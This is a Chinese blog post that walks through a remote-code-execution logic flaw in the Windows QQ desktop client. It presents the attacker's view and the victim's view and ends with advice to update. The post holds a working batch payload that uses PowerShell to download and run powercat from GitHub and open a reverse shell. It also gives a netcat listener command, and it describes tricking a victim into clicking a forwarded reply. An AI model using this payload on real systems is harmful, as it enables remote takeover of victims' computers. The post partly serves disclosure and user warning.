[赛博昆仑] 腾讯QQ_PC端,逻辑漏洞导致RCE漏洞

简介

!! 内容仅供学习,请不要进行非法网络活动,网络不是法外之地!!

赛博昆仑是国内一家较为知名的网络安全公司,该公司今日报告称 Windows 版腾讯 QQ 桌面客户端出现高危安全漏洞,据称“黑客利用难度极低、危害较大”,腾讯刚刚已经紧急发布了 9.7.15 版本 QQ,修复了该漏洞

攻击者视角

攻击者配置木马,这里使用powershell反弹会话模拟木马程序

@echo off powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c ?.?.?.? -p ????? -e cmd pause

[赛博昆仑] 腾讯QQ_PC端,逻辑漏洞导致RCE漏洞_第1张图片

本地发送一次

[赛博昆仑] 腾讯QQ_PC端,逻辑漏洞导致RCE漏洞_第2张图片

选择回复

[赛博昆仑] 腾讯QQ_PC端,逻辑漏洞导致RCE漏洞_第3张图片
最终Payload
[赛博昆仑] 腾讯QQ_PC端,逻辑漏洞导致RCE漏洞_第4张图片

转发给受害者
————————

nc -lvvp 10031

[赛博昆仑] 腾讯QQ_PC端,逻辑漏洞导致RCE漏洞_第5张图片

受害者点击回复内容后得到会话

[赛博昆仑] 腾讯QQ_PC端,逻辑漏洞导致RCE漏洞_第6张图片

受害者视角

受害者点击回复内容,直接下载并自动打开木马文件

[赛博昆仑] 腾讯QQ_PC端,逻辑漏洞导致RCE漏洞_第7张图片

[赛博昆仑] 腾讯QQ_PC端,逻辑漏洞导致RCE漏洞_第8张图片

总结

近期,不要点击陌生人发送任何具有诱惑力的回复信息(可能会和其他rar或pdf等漏洞打组合拳利用),及时更新PC端QQ版本,此漏洞问题影响 Windows 版 QQ 9.7.13 及之前版本,QQ NT 版本不受该漏洞影响,安卓端用户不受影响

你可能感兴趣的:(实战,web安全)